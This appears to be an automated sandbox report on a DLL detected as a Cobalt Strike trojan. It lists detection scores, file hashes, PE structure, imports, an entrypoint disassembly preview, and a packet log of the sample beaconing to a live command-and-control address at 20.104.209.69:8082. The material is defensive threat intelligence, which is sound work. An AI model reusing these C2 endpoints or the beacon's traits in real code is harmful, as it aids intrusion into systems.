This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
8082-x86.dll	88%	ReversingLabs	Win32.Trojan.CobaltStrike
8082-x86.dll	70%	Virustotal		Browse
8082-x86.dll	100%	Avira	HEUR/AGEN.1235510
8082-x86.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://20.104.209.69:8082/broadcast	0%	Avira URL Cloud	safe
http://20.104.209.69:8082/1/events/com.amazon.csm.csa.prod	0%	Avira URL Cloud	safe
20.104.209.69	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://20.104.209.69:8082/broadcast	true	Avira URL Cloud: safe	unknown
20.104.209.69	true	Avira URL Cloud: safe	unknown
http://20.104.209.69:8082/1/events/com.amazon.csm.csa.prod	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-8	loaddll32.exe, 00000000.00000002.620161836.0000000000E2E000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.620169392.0000000000E58000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
20.104.209.69	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	780200
Start date and time:	2023-01-08 16:02:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	8082-x86.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.winDLL@14/0@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 98% Number of executed functions: 34 Number of non-executed functions: 21
Cookbook Comments:	Found application associated with file extension: .dll Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
20.104.209.69	8082-x86.exe	Get hash	malicious	Browse	20.104.209.69:8082/broadcast
	8082-x64.ps1	Get hash	malicious	Browse	20.104.209.69:8082/broadcast
	8082-x64.exe	Get hash	malicious	Browse	20.104.209.69:8082/broadcast
	8082-x86.ps1	Get hash	malicious	Browse	20.104.209.69:8082/broadcast

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	8082-x86.exe	Get hash	malicious	Browse	20.104.209.69
	8082-x64.ps1	Get hash	malicious	Browse	20.104.209.69
	8082-x64.exe	Get hash	malicious	Browse	20.104.209.69
	8082-x86.ps1	Get hash	malicious	Browse	20.104.209.69
	YhfJ5sKIz3.elf	Get hash	malicious	Browse	20.124.38.248
	file.exe	Get hash	malicious	Browse	40.93.207.2
	XsP344f0F0.elf	Get hash	malicious	Browse	40.91.21.6
	file.exe	Get hash	malicious	Browse	40.93.207.0
	41bV0jyqt6.elf	Get hash	malicious	Browse	40.65.177.74
	file.exe	Get hash	malicious	Browse	40.93.207.2
	file.exe	Get hash	malicious	Browse	104.47.54.36
	JzKeM0GpxV.elf	Get hash	malicious	Browse	20.182.19.237
	file.exe	Get hash	malicious	Browse	40.93.207.2
	file.exe	Get hash	malicious	Browse	40.93.207.1
	12OMRfKxvu.elf	Get hash	malicious	Browse	51.125.192.211
	7JE8iEYd60.elf	Get hash	malicious	Browse	40.96.50.119
	U1lnaOUMhH.elf	Get hash	malicious	Browse	20.208.28.125
	AP7H3dk8Ul.elf	Get hash	malicious	Browse	20.223.104.8
	8jK7X0Nc8M.elf	Get hash	malicious	Browse	20.84.217.81
	1UpEPaCgSt.elf	Get hash	malicious	Browse	13.90.15.241

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.6495124481937875
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8082-x86.dll
File size:	285184
MD5:	8d72fc6ff9cb0971df587d20dda5e8c8
SHA1:	d6031029133084901392b856fe66f00f438d95d9
SHA256:	0b7d19cf030839c3df481069772c7a32b5a3be4c41ce6b436ab69015fa90d98a
SHA512:	9c2074e9e68676ce41346f9bce266fb1155d75fc4f1efc6f40bbcb7871ab6a2f7eda724c4381dd288d817929117fbea9bd3a6d0c977f3db5a55fad1bb35e294d
SSDEEP:	3072:GjXnzH5O+xdKYgC2F/bHnOdisDmtam6SBSZge2x7WBNvjxDld7JOwy6t7bAl+dBj:mNaYn+HNtaJD7VUwl7Y+T
TLSH:	1154CFE5B1DC6B67F844BABA93E1EA0A32A93CD88214E511B3FDDFF6210145CB8D44C5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^...........#.........V...... ........0.....k................................4......... ............................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x6bac1420
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x6bac0000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
DLL Characteristics:
Time Stamp:	0x5EDED50C [Tue Jun 9 00:17:16 2020 UTC]
TLS Callbacks:	0x6bac1a50, 0x6bac1a00
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e1dcffde169ed8b947dc63acdb78aeca

Entrypoint Preview

Instruction
sub esp, 1Ch
mov edx, dword ptr [esp+24h]
mov dword ptr [6BB07018h], 00000000h
cmp edx, 01h
je 00007FBA3CA7FA6Ch
mov ecx, dword ptr [esp+28h]
mov eax, dword ptr [esp+20h]
call 00007FBA3CA7F872h
add esp, 1Ch
retn 000Ch
lea esi, dword ptr [esi+00000000h]
mov dword ptr [esp+0Ch], edx
call 00007FBA3CA807ECh
mov edx, dword ptr [esp+0Ch]
jmp 00007FBA3CA7FA29h
nop
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword ptr [6BB05418h]
test eax, eax
je 00007FBA3CA7FA8Eh
mov dword ptr [esp], 6BB06000h
call dword ptr [6BB09138h]
mov edx, 00000000h
sub esp, 04h
test eax, eax
je 00007FBA3CA7FA68h
mov dword ptr [esp+04h], 6BB0600Eh
mov dword ptr [esp], eax
call dword ptr [6BB0913Ch]
sub esp, 08h
mov edx, eax
test edx, edx
je 00007FBA3CA7FA5Bh
mov dword ptr [esp], 6BB05418h
call edx
leave
ret
lea esi, dword ptr [esi+00h]
push ebp
mov ebp, esp
pop ebp
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 4Ch
mov edi, dword ptr [ebp+08h]
mov esi, dword ptr [ebp+0Ch]
mov dword ptr [ebp-1Ch], 00000000h
mov dword ptr [esp+1Ch], 00000000h
mov dword ptr [esp+18h], 00000000h
mov dword ptr [eax+eax+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x48000	0xb0	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x49000	0x5bc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c000	0x4ac	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b000	0x18	.tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x49108	0xcc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1a84	0x1c00	False	0.5262276785714286	data	5.9055220621274644	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x3000	0x4241c	0x42600	False	0.5397871056967984	data	6.6586521702558805	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x46000	0x1a0	0x200	False	0.529296875	data	4.462802731767267	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x47000	0x418	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x48000	0xb0	0x200	False	0.2734375	data	1.9817948694706844	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata	0x49000	0x5bc	0x600	False	0.4296875	data	4.870768861754693	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x4a000	0x2c	0x200	False	0.052734375	data	0.18120187678200297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x4b000	0x20	0x200	False	0.0546875	data	0.2797047950073886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x4c000	0x4ac	0x600	False	0.7005208333333334	data	5.557340256736937	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, QueryPerformanceCounter, ReadFile, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile

msvcrt.dll

__dllonexit, _amsg_exit, _initterm, _iob, _lock, _onexit, _unlock, _winmajor, abort, calloc, free, fwrite, malloc, memcpy, sprintf, strlen, strncmp, vfprintf

Exports

Name	Ordinal	Address
DllGetClassObject	1	0x6bac17ee
DllMain	2	0x6bac178b
DllRegisterServer	3	0x6bac17e0
DllUnregisterServer	4	0x6bac17e7
StartW	5	0x6bac1803

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2023 16:03:30.432375908 CET	49685	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:03:30.547492981 CET	8082	49685	20.104.209.69	192.168.2.4
Jan 8, 2023 16:03:30.547652960 CET	49685	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:03:30.574161053 CET	49685	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:03:30.690412045 CET	8082	49685	20.104.209.69	192.168.2.4
Jan 8, 2023 16:03:30.692807913 CET	8082	49685	20.104.209.69	192.168.2.4
Jan 8, 2023 16:03:30.692890882 CET	8082	49685	20.104.209.69	192.168.2.4
Jan 8, 2023 16:03:30.692893028 CET	49685	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:03:30.692970037 CET	49685	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:03:30.692990065 CET	8082	49685	20.104.209.69	192.168.2.4
Jan 8, 2023 16:03:30.693047047 CET	49685	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:03:30.694236040 CET	49685	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:03:30.809875965 CET	8082	49685	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.041449070 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.155930996 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.156147957 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.156966925 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.270982027 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285484076 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285547018 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285581112 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285617113 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285650969 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285684109 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285711050 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.285716057 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285751104 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285788059 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285801888 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.285828114 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.285830975 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.285868883 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400144100 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400207043 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400235891 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400262117 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400286913 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400311947 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400336981 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400366068 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400386095 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400424004 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400440931 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400471926 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400480986 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400501966 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400507927 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400528908 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400530100 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400547981 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400557041 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400567055 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400584936 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400602102 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400613070 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400628090 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400638103 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400662899 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400680065 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400741100 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400769949 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400798082 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400813103 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400819063 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400845051 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.400854111 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.400887966 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.515465975 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.515511036 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.515531063 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.515554905 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.515674114 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.515723944 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.515738010 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.515748978 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.515769958 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.515774012 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.515791893 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.515799046 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.515832901 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.516217947 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516247034 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516267061 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516287088 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516295910 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.516344070 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.516704082 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516726017 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516746044 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516767025 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516777992 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.516788006 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516823053 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.516834974 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516855955 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516875982 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.516885996 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.516904116 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.516952038 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517013073 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517034054 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517060995 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517067909 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517091036 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517096043 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517117977 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517151117 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517215014 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517239094 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517260075 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517266035 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517281055 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517285109 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517302990 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517323971 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517338037 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517343998 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517348051 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517384052 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517398119 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517426968 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517446041 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517456055 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517467976 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517488956 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517493963 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517509937 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517529964 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517534018 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517550945 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517558098 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517571926 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.517596006 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.517635107 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630100965 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630146027 CET	8082	49686	20.104.209.69	192.168.2.4
